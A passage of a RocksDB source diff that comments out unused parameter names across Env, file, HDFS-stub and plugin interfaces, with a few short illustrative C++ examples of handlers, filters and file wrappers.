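#include <cstdio>

#include "rocksdb/write_batch.h"

// Hypothetical handler for illustration; overrides that ignore an argument
// keep only its commented-out name, like the rest of this patch.
struct PrintingHandler : public rocksdb::WriteBatch::Handler {
  rocksdb::Status PutCF(uint32_t /*column_family_id*/,
                        const rocksdb::Slice& key,
                        const rocksdb::Slice& value) override {
    std::printf("put %s=%s\n", key.ToString().c_str(),
                value.ToString().c_str());
    return rocksdb::Status::OK();
  }
  void LogData(const rocksdb::Slice& /*blob*/) override {}
};

// Usage:
//   rocksdb::WriteBatch batch;
//   batch.Put("k", "v");
//   PrintingHandler handler;
//   batch.Iterate(&handler);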
-size_t CTREncryptionProvider::PopulateSecretPrefixPart(char *prefix, size_t prefixLength, size_t blockSize) { +size_t CTREncryptionProvider::PopulateSecretPrefixPart(char* /*prefix*/, + size_t /*prefixLength*/, + size_t /*blockSize*/) { // Nothing to do here, put in custom data in override when needed. return 0; } @@ -898,8 +902,10 @@ Status CTREncryptionProvider::CreateCipherStream(const std::string& fname, const // CreateCipherStreamFromPrefix creates a block access cipher stream for a file given // given name and options. The given prefix is already decrypted. -Status CTREncryptionProvider::CreateCipherStreamFromPrefix(const std::string& fname, const EnvOptions& options, - uint64_t initialCounter, const Slice& iv, const Slice& prefix, unique_ptr* result) { +Status CTREncryptionProvider::CreateCipherStreamFromPrefix( + const std::string& /*fname*/, const EnvOptions& /*options*/, + uint64_t initialCounter, const Slice& iv, const Slice& /*prefix*/, + unique_ptr* result) { (*result) = unique_ptr(new CTRCipherStream(cipher_, iv.data(), initialCounter)); return Status::OK(); } diff --git a/env/env_hdfs.cc b/env/env_hdfs.cc index d98020c76b3..6dbbd86273d 100644 --- a/env/env_hdfs.cc +++ b/env/env_hdfs.cc @@ -598,13 +598,13 @@ Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) { // dummy placeholders used when HDFS is not available namespace rocksdb { - Status HdfsEnv::NewSequentialFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) { - return Status::NotSupported("Not compiled with hdfs support"); +Status HdfsEnv::NewSequentialFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) { + return Status::NotSupported("Not compiled with hdfs support"); } - Status NewHdfsEnv(Env** hdfs_env, const std::string& fsname) { + Status NewHdfsEnv(Env** /*hdfs_env*/, const std::string& /*fsname*/) { return Status::NotSupported("Not compiled with hdfs support"); } } diff --git a/env/env_test.cc b/env/env_test.cc index 7fd71a3c430..8606bb12a11 100644 --- a/env/env_test.cc +++ b/env/env_test.cc @@ -1248,33 +1248,36 @@ TEST_P(EnvPosixTestWithParam, WritableFileWrapper) { inc(0); } - Status Append(const Slice& data) override { inc(1); return Status::OK(); } - Status Truncate(uint64_t size) override { return Status::OK(); } + Status Append(const Slice& /*data*/) override { + inc(1); + return Status::OK(); + } + Status Truncate(uint64_t /*size*/) override { return Status::OK(); } Status Close() override { inc(2); return Status::OK(); } Status Flush() override { inc(3); return Status::OK(); } Status Sync() override { inc(4); return Status::OK(); } Status Fsync() override { inc(5); return Status::OK(); } - void SetIOPriority(Env::IOPriority pri) override { inc(6); } + void SetIOPriority(Env::IOPriority /*pri*/) override { inc(6); } uint64_t GetFileSize() override { inc(7); return 0; } - void GetPreallocationStatus(size_t* block_size, - size_t* last_allocated_block) override { + void GetPreallocationStatus(size_t* /*block_size*/, + size_t* /*last_allocated_block*/) override { inc(8); } - size_t GetUniqueId(char* id, size_t max_size) const override { + size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const override { inc(9); return 0; } - Status InvalidateCache(size_t offset, size_t length) override { + Status InvalidateCache(size_t /*offset*/, size_t /*length*/) override { inc(10); return Status::OK(); } protected: - Status Allocate(uint64_t offset, uint64_t len) override { + Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) 
override { inc(11); return Status::OK(); } - Status RangeSync(uint64_t offset, uint64_t nbytes) override { + Status RangeSync(uint64_t /*offset*/, uint64_t /*nbytes*/) override { inc(12); return Status::OK(); } diff --git a/env/io_posix.cc b/env/io_posix.cc index c5b14d3effe..cf96795c443 100644 --- a/env/io_posix.cc +++ b/env/io_posix.cc @@ -443,7 +443,7 @@ PosixMmapReadableFile::~PosixMmapReadableFile() { } Status PosixMmapReadableFile::Read(uint64_t offset, size_t n, Slice* result, - char* scratch) const { + char* /*scratch*/) const { Status s; if (offset > length_) { *result = Slice(); @@ -922,7 +922,7 @@ size_t PosixWritableFile::GetUniqueId(char* id, size_t max_size) const { */ PosixRandomRWFile::PosixRandomRWFile(const std::string& fname, int fd, - const EnvOptions& options) + const EnvOptions& /*options*/) : filename_(fname), fd_(fd) {} PosixRandomRWFile::~PosixRandomRWFile() { diff --git a/env/io_posix.h b/env/io_posix.h index 69c98438f27..e83f2df7332 100644 --- a/env/io_posix.h +++ b/env/io_posix.h @@ -201,7 +201,7 @@ class PosixMmapFile : public WritableFile { // Means Close() will properly take care of truncate // and it does not need any additional information - virtual Status Truncate(uint64_t size) override { return Status::OK(); } + virtual Status Truncate(uint64_t /*size*/) override { return Status::OK(); } virtual Status Close() override; virtual Status Append(const Slice& data) override; virtual Status Flush() override; diff --git a/env/mock_env.cc b/env/mock_env.cc index 79a4f8c44a6..b59047bdeb6 100644 --- a/env/mock_env.cc +++ b/env/mock_env.cc @@ -445,8 +445,8 @@ MockEnv::~MockEnv() { // Partial implementation of the Env interface. Status MockEnv::NewSequentialFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& soptions) { + unique_ptr* result, + const EnvOptions& /*soptions*/) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -462,8 +462,8 @@ Status MockEnv::NewSequentialFile(const std::string& fname, } Status MockEnv::NewRandomAccessFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& soptions) { + unique_ptr* result, + const EnvOptions& /*soptions*/) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -480,7 +480,7 @@ Status MockEnv::NewRandomAccessFile(const std::string& fname, Status MockEnv::NewRandomRWFile(const std::string& fname, unique_ptr* result, - const EnvOptions& soptions) { + const EnvOptions& /*soptions*/) { auto fn = NormalizePath(fname); MutexLock lock(&mutex_); if (file_map_.find(fn) == file_map_.end()) { @@ -523,8 +523,8 @@ Status MockEnv::NewWritableFile(const std::string& fname, return Status::OK(); } -Status MockEnv::NewDirectory(const std::string& name, - unique_ptr* result) { +Status MockEnv::NewDirectory(const std::string& /*name*/, + unique_ptr* result) { result->reset(new MockEnvDirectory()); return Status::OK(); } diff --git a/hdfs/env_hdfs.h b/hdfs/env_hdfs.h index 3a62bc8cb92..2ed6ba6d8a6 100644 --- a/hdfs/env_hdfs.h +++ b/hdfs/env_hdfs.h @@ -245,7 +245,7 @@ static const Status notsup; class HdfsEnv : public Env { public: - explicit HdfsEnv(const std::string& fsname) { + explicit HdfsEnv(const std::string& /*fsname*/) { fprintf(stderr, "You have not build rocksdb with HDFS support\n"); fprintf(stderr, "Please see hdfs/README for details\n"); abort(); @@ -258,112 +258,125 @@ class HdfsEnv : public Env { unique_ptr* result, const EnvOptions& options) override; - virtual Status 
NewRandomAccessFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) override { + virtual Status NewRandomAccessFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) override { return notsup; } - virtual Status NewWritableFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) override { + virtual Status NewWritableFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) override { return notsup; } - virtual Status NewDirectory(const std::string& name, - unique_ptr* result) override { + virtual Status NewDirectory(const std::string& /*name*/, + unique_ptr* /*result*/) override { return notsup; } - virtual Status FileExists(const std::string& fname) override { + virtual Status FileExists(const std::string& /*fname*/) override { return notsup; } - virtual Status GetChildren(const std::string& path, - std::vector* result) override { + virtual Status GetChildren(const std::string& /*path*/, + std::vector* /*result*/) override { return notsup; } - virtual Status DeleteFile(const std::string& fname) override { + virtual Status DeleteFile(const std::string& /*fname*/) override { return notsup; } - virtual Status CreateDir(const std::string& name) override { return notsup; } + virtual Status CreateDir(const std::string& /*name*/) override { + return notsup; + } - virtual Status CreateDirIfMissing(const std::string& name) override { + virtual Status CreateDirIfMissing(const std::string& /*name*/) override { return notsup; } - virtual Status DeleteDir(const std::string& name) override { return notsup; } + virtual Status DeleteDir(const std::string& /*name*/) override { + return notsup; + } - virtual Status GetFileSize(const std::string& fname, - uint64_t* size) override { + virtual Status GetFileSize(const std::string& /*fname*/, + uint64_t* /*size*/) override { return notsup; } - virtual Status GetFileModificationTime(const std::string& fname, - uint64_t* time) override { + virtual Status GetFileModificationTime(const std::string& /*fname*/, + uint64_t* /*time*/) override { return notsup; } - virtual Status RenameFile(const std::string& src, - const std::string& target) override { + virtual Status RenameFile(const std::string& /*src*/, + const std::string& /*target*/) override { return notsup; } - virtual Status LinkFile(const std::string& src, - const std::string& target) override { + virtual Status LinkFile(const std::string& /*src*/, + const std::string& /*target*/) override { return notsup; } - virtual Status LockFile(const std::string& fname, FileLock** lock) override { + virtual Status LockFile(const std::string& /*fname*/, + FileLock** /*lock*/) override { return notsup; } - virtual Status UnlockFile(FileLock* lock) override { return notsup; } + virtual Status UnlockFile(FileLock* /*lock*/) override { return notsup; } - virtual Status NewLogger(const std::string& fname, - shared_ptr* result) override { + virtual Status NewLogger(const std::string& /*fname*/, + shared_ptr* /*result*/) override { return notsup; } - virtual void Schedule(void (*function)(void* arg), void* arg, - Priority pri = LOW, void* tag = nullptr, - void (*unschedFunction)(void* arg) = 0) override {} + virtual void Schedule(void (*/*function*/)(void* arg), void* /*arg*/, + Priority /*pri*/ = LOW, void* /*tag*/ = nullptr, + void (*/*unschedFunction*/)(void* arg) = 0) override {} - virtual int UnSchedule(void* tag, Priority pri) override { return 0; } + virtual int UnSchedule(void* /*tag*/, 
Priority /*pri*/) override { return 0; } - virtual void StartThread(void (*function)(void* arg), void* arg) override {} + virtual void StartThread(void (*/*function*/)(void* arg), + void* /*arg*/) override {} virtual void WaitForJoin() override {} virtual unsigned int GetThreadPoolQueueLen( - Priority pri = LOW) const override { + Priority /*pri*/ = LOW) const override { return 0; } - virtual Status GetTestDirectory(std::string* path) override { return notsup; } + virtual Status GetTestDirectory(std::string* /*path*/) override { + return notsup; + } virtual uint64_t NowMicros() override { return 0; } - virtual void SleepForMicroseconds(int micros) override {} + virtual void SleepForMicroseconds(int /*micros*/) override {} - virtual Status GetHostName(char* name, uint64_t len) override { + virtual Status GetHostName(char* /*name*/, uint64_t /*len*/) override { return notsup; } - virtual Status GetCurrentTime(int64_t* unix_time) override { return notsup; } + virtual Status GetCurrentTime(int64_t* /*unix_time*/) override { + return notsup; + } - virtual Status GetAbsolutePath(const std::string& db_path, - std::string* outputpath) override { + virtual Status GetAbsolutePath(const std::string& /*db_path*/, + std::string* /*outputpath*/) override { return notsup; } - virtual void SetBackgroundThreads(int number, Priority pri = LOW) override {} - virtual int GetBackgroundThreads(Priority pri = LOW) override { return 0; } - virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) override { + virtual void SetBackgroundThreads(int /*number*/, + Priority /*pri*/ = LOW) override {} + virtual int GetBackgroundThreads(Priority /*pri*/ = LOW) override { + return 0; } - virtual std::string TimeToString(uint64_t number) override { return ""; } + virtual void IncBackgroundThreadsIfNeeded(int /*number*/, + Priority /*pri*/) override {} + virtual std::string TimeToString(uint64_t /*number*/) override { return ""; } virtual uint64_t GetThreadID() const override { return 0; diff --git a/include/rocksdb/cache.h b/include/rocksdb/cache.h index 5ebd66bde88..88efdb05eeb 100644 --- a/include/rocksdb/cache.h +++ b/include/rocksdb/cache.h @@ -189,7 +189,8 @@ class Cache { // Mark the last inserted object as being a raw data block. This will be used // in tests. The default implementation does nothing. - virtual void TEST_mark_as_data_block(const Slice& key, size_t charge) {} + virtual void TEST_mark_as_data_block(const Slice& /*key*/, + size_t /*charge*/) {} private: // No copying allowed diff --git a/include/rocksdb/compaction_filter.h b/include/rocksdb/compaction_filter.h index 9a8c0318c5d..94069a91490 100644 --- a/include/rocksdb/compaction_filter.h +++ b/include/rocksdb/compaction_filter.h @@ -97,8 +97,10 @@ class CompactionFilter { // The last paragraph is not true if you set max_subcompactions to more than // 1. In that case, subcompaction from multiple threads may call a single // CompactionFilter concurrently. - virtual bool Filter(int level, const Slice& key, const Slice& existing_value, - std::string* new_value, bool* value_changed) const { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*existing_value*/, + std::string* /*new_value*/, + bool* /*value_changed*/) const { return false; } @@ -111,8 +113,8 @@ class CompactionFilter { // may not realize there is a write conflict and may allow a Transaction to // Commit that should have failed. Instead, it is better to implement any // Merge filtering inside the MergeOperator. 
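// Illustrative aside, not part of the patch: CompactionFilter::Filter()
// above defaults to "keep everything", and implementations name only the
// parameters they actually read. A hypothetical filter that drops entries
// with an empty value (installed via ColumnFamilyOptions::compaction_filter):
#include "rocksdb/compaction_filter.h"

class DropEmptyValueFilter : public rocksdb::CompactionFilter {
 public:
  bool Filter(int /*level*/, const rocksdb::Slice& /*key*/,
              const rocksdb::Slice& existing_value,
              std::string* /*new_value*/,
              bool* /*value_changed*/) const override {
    return existing_value.empty();  // returning true removes the entry
  }
  const char* Name() const override { return "DropEmptyValueFilter"; }
};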
- virtual bool FilterMergeOperand(int level, const Slice& key, - const Slice& operand) const { + virtual bool FilterMergeOperand(int /*level*/, const Slice& /*key*/, + const Slice& /*operand*/) const { return false; } @@ -157,7 +159,7 @@ class CompactionFilter { // MergeOperator. virtual Decision FilterV2(int level, const Slice& key, ValueType value_type, const Slice& existing_value, std::string* new_value, - std::string* skip_until) const { + std::string* /*skip_until*/) const { switch (value_type) { case ValueType::kValue: { bool value_changed = false; diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index ee5706b4c8b..7c1cc316ef3 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -855,7 +855,7 @@ class DB { // Flush the WAL memory buffer to the file. If sync is true, it calls SyncWAL // afterwards. - virtual Status FlushWAL(bool sync) { + virtual Status FlushWAL(bool /*sync*/) { return Status::NotSupported("FlushWAL not implemented"); } // Sync the wal. Note that Write() followed by SyncWAL() is not exactly the diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index 8690738998f..78864dd7982 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -170,9 +170,9 @@ class Env { // returns non-OK. // // The returned file will only be accessed by one thread at a time. - virtual Status ReopenWritableFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) { + virtual Status ReopenWritableFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) { return Status::NotSupported(); } @@ -187,9 +187,9 @@ class Env { // *result and returns OK. On failure returns non-OK. // // The returned file will only be accessed by one thread at a time. - virtual Status NewRandomRWFile(const std::string& fname, - unique_ptr* result, - const EnvOptions& options) { + virtual Status NewRandomRWFile(const std::string& /*fname*/, + unique_ptr* /*result*/, + const EnvOptions& /*options*/) { return Status::NotSupported("RandomRWFile is not implemented in this Env"); } @@ -257,7 +257,8 @@ class Env { const std::string& target) = 0; // Hard Link file src to target. - virtual Status LinkFile(const std::string& src, const std::string& target) { + virtual Status LinkFile(const std::string& /*src*/, + const std::string& /*target*/) { return Status::NotSupported("LinkFile is not supported for this Env"); } @@ -308,7 +309,7 @@ class Env { // Arrange to remove jobs for given arg from the queue_ if they are not // already scheduled. Caller is expected to have exclusive lock on arg. - virtual int UnSchedule(void* arg, Priority pri) { return 0; } + virtual int UnSchedule(void* /*arg*/, Priority /*pri*/) { return 0; } // Start a new thread, invoking "function(arg)" within the new thread. // When "function(arg)" returns, the thread will be destroyed. @@ -318,7 +319,7 @@ class Env { virtual void WaitForJoin() {} // Get thread pool queue length for specific thread pool. - virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const { + virtual unsigned int GetThreadPoolQueueLen(Priority /*pri*/ = LOW) const { return 0; } @@ -372,7 +373,7 @@ class Env { virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) = 0; // Lower IO priority for threads from the specified pool. 
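// Illustrative aside, not part of the patch: the Env methods above (for
// example LinkFile) default to Status::NotSupported(), so callers probe for
// the capability instead of assuming it. A hedged sketch of that calling
// pattern, with a byte-copy fallback built only from core Env calls:
#include <memory>
#include <string>
#include "rocksdb/env.h"

rocksdb::Status LinkOrCopy(rocksdb::Env* env, const std::string& src,
                           const std::string& dst) {
  rocksdb::Status s = env->LinkFile(src, dst);
  if (!s.IsNotSupported()) {
    return s;  // hard link worked, or failed for a real reason
  }
  std::unique_ptr<rocksdb::SequentialFile> in;
  std::unique_ptr<rocksdb::WritableFile> out;
  rocksdb::EnvOptions opts;
  s = env->NewSequentialFile(src, &in, opts);
  if (!s.ok()) return s;
  s = env->NewWritableFile(dst, &out, opts);
  if (!s.ok()) return s;
  char scratch[8192];
  rocksdb::Slice chunk;
  do {  // SequentialFile::Read() yields an empty slice at end of file
    s = in->Read(sizeof(scratch), &chunk, scratch);
    if (!s.ok()) return s;
    if (!chunk.empty()) s = out->Append(chunk);
    if (!s.ok()) return s;
  } while (!chunk.empty());
  return out->Close();
}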
- virtual void LowerThreadPoolIOPriority(Priority pool = LOW) {} + virtual void LowerThreadPoolIOPriority(Priority /*pool*/ = LOW) {} // Converts seconds-since-Jan-01-1970 to a printable string virtual std::string TimeToString(uint64_t time) = 0; @@ -416,7 +417,7 @@ class Env { const ImmutableDBOptions& db_options) const; // Returns the status of all threads that belong to the current Env. - virtual Status GetThreadList(std::vector* thread_list) { + virtual Status GetThreadList(std::vector* /*thread_list*/) { return Status::NotSupported("Not supported."); } @@ -482,14 +483,14 @@ class SequentialFile { // Remove any kind of caching of data from the offset to offset+length // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. - virtual Status InvalidateCache(size_t offset, size_t length) { + virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { return Status::NotSupported("InvalidateCache not supported."); } // Positioned Read for direct I/O // If Direct I/O enabled, offset, n, and scratch should be properly aligned - virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result, - char* scratch) { + virtual Status PositionedRead(uint64_t /*offset*/, size_t /*n*/, + Slice* /*result*/, char* /*scratch*/) { return Status::NotSupported(); } }; @@ -515,7 +516,7 @@ class RandomAccessFile { char* scratch) const = 0; // Readahead the file starting from offset by n bytes for caching. - virtual Status Prefetch(uint64_t offset, size_t n) { + virtual Status Prefetch(uint64_t /*offset*/, size_t /*n*/) { return Status::OK(); } @@ -534,14 +535,14 @@ class RandomAccessFile { // a single varint. // // Note: these IDs are only valid for the duration of the process. - virtual size_t GetUniqueId(char* id, size_t max_size) const { + virtual size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const { return 0; // Default implementation to prevent issues with backwards // compatibility. }; enum AccessPattern { NORMAL, RANDOM, SEQUENTIAL, WILLNEED, DONTNEED }; - virtual void Hint(AccessPattern pattern) {} + virtual void Hint(AccessPattern /*pattern*/) {} // Indicates the upper layers if the current RandomAccessFile implementation // uses direct IO. @@ -554,7 +555,7 @@ class RandomAccessFile { // Remove any kind of caching of data from the offset to offset+length // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. - virtual Status InvalidateCache(size_t offset, size_t length) { + virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { return Status::NotSupported("InvalidateCache not supported."); } }; @@ -604,9 +605,7 @@ class WritableFile { // before closing. It is not always possible to keep track of the file // size due to whole pages writes. The behavior is undefined if called // with other writes to follow. 
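// Illustrative aside, not part of the patch: RandomAccessFile ships no-op
// defaults for Prefetch(), Hint(), GetUniqueId() and InvalidateCache(), so
// a thin wrapper only has to forward the pure-virtual Read(). Sketch:
#include <memory>
#include "rocksdb/env.h"

class ForwardingRandomAccessFile : public rocksdb::RandomAccessFile {
 public:
  explicit ForwardingRandomAccessFile(
      std::unique_ptr<rocksdb::RandomAccessFile> base)
      : base_(std::move(base)) {}
  rocksdb::Status Read(uint64_t offset, size_t n, rocksdb::Slice* result,
                       char* scratch) const override {
    return base_->Read(offset, n, result, scratch);
  }
  // Prefetch/Hint/GetUniqueId/InvalidateCache: the inherited defaults shown
  // above already do the right (conservative) thing.
 private:
  std::unique_ptr<rocksdb::RandomAccessFile> base_;
};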
- virtual Status Truncate(uint64_t size) { - return Status::OK(); - } + virtual Status Truncate(uint64_t /*size*/) { return Status::OK(); } virtual Status Close() = 0; virtual Status Flush() = 0; virtual Status Sync() = 0; // sync data @@ -668,7 +667,7 @@ class WritableFile { } // For documentation, refer to RandomAccessFile::GetUniqueId() - virtual size_t GetUniqueId(char* id, size_t max_size) const { + virtual size_t GetUniqueId(char* /*id*/, size_t /*max_size*/) const { return 0; // Default implementation to prevent issues with backwards } @@ -676,7 +675,7 @@ class WritableFile { // of this file. If the length is 0, then it refers to the end of file. // If the system is not caching the file contents, then this is a noop. // This call has no effect on dirty pages in the cache. - virtual Status InvalidateCache(size_t offset, size_t length) { + virtual Status InvalidateCache(size_t /*offset*/, size_t /*length*/) { return Status::NotSupported("InvalidateCache not supported."); } @@ -686,7 +685,9 @@ class WritableFile { // This asks the OS to initiate flushing the cached data to disk, // without waiting for completion. // Default implementation does nothing. - virtual Status RangeSync(uint64_t offset, uint64_t nbytes) { return Status::OK(); } + virtual Status RangeSync(uint64_t /*offset*/, uint64_t /*nbytes*/) { + return Status::OK(); + } // PrepareWrite performs any necessary preparation for a write // before the write actually occurs. This allows for pre-allocation @@ -713,7 +714,7 @@ class WritableFile { } // Pre-allocates space for a file. - virtual Status Allocate(uint64_t offset, uint64_t len) { + virtual Status Allocate(uint64_t /*offset*/, uint64_t /*len*/) { return Status::OK(); } diff --git a/include/rocksdb/filter_policy.h b/include/rocksdb/filter_policy.h index 8c813d93e65..d442837e61e 100644 --- a/include/rocksdb/filter_policy.h +++ b/include/rocksdb/filter_policy.h @@ -45,7 +45,7 @@ class FilterBitsBuilder { virtual Slice Finish(std::unique_ptr* buf) = 0; // Calculate num of entries fit into a space. - virtual int CalculateNumEntry(const uint32_t space) { + virtual int CalculateNumEntry(const uint32_t /*space*/) { #ifndef ROCKSDB_LITE throw std::runtime_error("CalculateNumEntry not Implemented"); #else @@ -114,7 +114,8 @@ class FilterPolicy { // Get the FilterBitsReader, which is ONLY used for full filter block // It contains interface to tell if key can be in filter // The input slice should NOT be deleted by FilterPolicy - virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents) const { + virtual FilterBitsReader* GetFilterBitsReader( + const Slice& /*contents*/) const { return nullptr; } }; diff --git a/include/rocksdb/iterator.h b/include/rocksdb/iterator.h index 4e09f64e9a6..cb734eccd93 100644 --- a/include/rocksdb/iterator.h +++ b/include/rocksdb/iterator.h @@ -51,7 +51,7 @@ class Iterator : public Cleanable { // Position at the last key in the source that at or before target // The iterator is Valid() after this call iff the source contains // an entry that comes at or before target. - virtual void SeekForPrev(const Slice& target) {} + virtual void SeekForPrev(const Slice& /*target*/) {} // Moves to the next entry in the source. After this call, Valid() is // true iff the iterator was not positioned at the last entry in the source. diff --git a/include/rocksdb/listener.h b/include/rocksdb/listener.h index 40d318e0941..b44c7a6900f 100644 --- a/include/rocksdb/listener.h +++ b/include/rocksdb/listener.h @@ -345,8 +345,8 @@ class EventListener { // returns. 
Otherwise, RocksDB may be blocked. // @param handle is a pointer to the column family handle to be deleted // which will become a dangling pointer after the deletion. - virtual void OnColumnFamilyHandleDeletionStarted(ColumnFamilyHandle* handle) { - } + virtual void OnColumnFamilyHandleDeletionStarted( + ColumnFamilyHandle* /*handle*/) {} // A call-back function for RocksDB which will be called after an external // file is ingested using IngestExternalFile. diff --git a/include/rocksdb/memtablerep.h b/include/rocksdb/memtablerep.h index 347dd3096c2..1256515d570 100644 --- a/include/rocksdb/memtablerep.h +++ b/include/rocksdb/memtablerep.h @@ -89,14 +89,14 @@ class MemTableRep { // // Currently only skip-list based memtable implement the interface. Other // implementations will fallback to Insert() by default. - virtual void InsertWithHint(KeyHandle handle, void** hint) { + virtual void InsertWithHint(KeyHandle handle, void** /*hint*/) { // Ignore the hint by default. Insert(handle); } // Like Insert(handle), but may be called concurrent with other calls // to InsertConcurrently for other handles - virtual void InsertConcurrently(KeyHandle handle) { + virtual void InsertConcurrently(KeyHandle /*handle*/) { #ifndef ROCKSDB_LITE throw std::runtime_error("concurrent insert not supported"); #else @@ -128,8 +128,8 @@ class MemTableRep { virtual void Get(const LookupKey& k, void* callback_args, bool (*callback_func)(void* arg, const char* entry)); - virtual uint64_t ApproximateNumEntries(const Slice& start_ikey, - const Slice& end_key) { + virtual uint64_t ApproximateNumEntries(const Slice& /*start_ikey*/, + const Slice& /*end_key*/) { return 0; } diff --git a/include/rocksdb/merge_operator.h b/include/rocksdb/merge_operator.h index 5fe3e0bfda8..c32249ee8fa 100644 --- a/include/rocksdb/merge_operator.h +++ b/include/rocksdb/merge_operator.h @@ -66,11 +66,9 @@ class MergeOperator { // internal corruption. This will be treated as an error by the library. // // Also make use of the *logger for error messages. - virtual bool FullMerge(const Slice& key, - const Slice* existing_value, - const std::deque& operand_list, - std::string* new_value, - Logger* logger) const { + virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, + const std::deque& /*operand_list*/, + std::string* /*new_value*/, Logger* /*logger*/) const { // deprecated, please use FullMergeV2() assert(false); return false; @@ -145,9 +143,10 @@ class MergeOperator { // If there is corruption in the data, handle it in the FullMergeV2() function // and return false there. The default implementation of PartialMerge will // always return false. - virtual bool PartialMerge(const Slice& key, const Slice& left_operand, - const Slice& right_operand, std::string* new_value, - Logger* logger) const { + virtual bool PartialMerge(const Slice& /*key*/, const Slice& /*left_operand*/, + const Slice& /*right_operand*/, + std::string* /*new_value*/, + Logger* /*logger*/) const { return false; } diff --git a/include/rocksdb/rate_limiter.h b/include/rocksdb/rate_limiter.h index 838c98a6de6..995bf952f9f 100644 --- a/include/rocksdb/rate_limiter.h +++ b/include/rocksdb/rate_limiter.h @@ -45,7 +45,7 @@ class RateLimiter { // Request for token for bytes. If this request can not be satisfied, the call // is blocked. 
Caller is responsible to make sure // bytes <= GetSingleBurstBytes() - virtual void Request(const int64_t bytes, const Env::IOPriority pri) { + virtual void Request(const int64_t /*bytes*/, const Env::IOPriority /*pri*/) { assert(false); } diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index fe8dee00f04..b45f95c10b7 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -173,7 +173,7 @@ class PinnableSlice : public Slice, public Cleanable { } } - void remove_prefix(size_t n) { + void remove_prefix(size_t /*n*/) { assert(0); // Not implemented } diff --git a/include/rocksdb/slice_transform.h b/include/rocksdb/slice_transform.h index fc82bf58456..2143057df8d 100644 --- a/include/rocksdb/slice_transform.h +++ b/include/rocksdb/slice_transform.h @@ -58,7 +58,7 @@ class SliceTransform { virtual bool InDomain(const Slice& key) const = 0; // This is currently not used and remains here for backward compatibility. - virtual bool InRange(const Slice& dst) const { return false; } + virtual bool InRange(const Slice& /*dst*/) const { return false; } // Transform(s)=Transform(`prefix`) for any s with `prefix` as a prefix. // @@ -83,7 +83,7 @@ class SliceTransform { // "abcd,e", the file can be filtered out and the key will be invisible. // // i.e., an implementation always returning false is safe. - virtual bool SameResultWhenAppended(const Slice& prefix) const { + virtual bool SameResultWhenAppended(const Slice& /*prefix*/) const { return false; } }; diff --git a/include/rocksdb/statistics.h b/include/rocksdb/statistics.h index b4629358e66..ad395cae475 100644 --- a/include/rocksdb/statistics.h +++ b/include/rocksdb/statistics.h @@ -445,7 +445,7 @@ class Statistics { virtual uint64_t getTickerCount(uint32_t tickerType) const = 0; virtual void histogramData(uint32_t type, HistogramData* const data) const = 0; - virtual std::string getHistogramString(uint32_t type) const { return ""; } + virtual std::string getHistogramString(uint32_t /*type*/) const { return ""; } virtual void recordTick(uint32_t tickerType, uint64_t count = 0) = 0; virtual void setTickerCount(uint32_t tickerType, uint64_t count) = 0; virtual uint64_t getAndResetTickerCount(uint32_t tickerType) = 0; diff --git a/include/rocksdb/utilities/geo_db.h b/include/rocksdb/utilities/geo_db.h index 408774c5990..ec3cbdf265a 100644 --- a/include/rocksdb/utilities/geo_db.h +++ b/include/rocksdb/utilities/geo_db.h @@ -80,7 +80,7 @@ class GeoDB : public StackableDB { // GeoDB owns the pointer `DB* db` now. You should not delete it or // use it after the invocation of GeoDB // GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {} - GeoDB(DB* db, const GeoDBOptions& options) : StackableDB(db) {} + GeoDB(DB* db, const GeoDBOptions& /*options*/) : StackableDB(db) {} virtual ~GeoDB() {} // Insert a new object into the location database. 
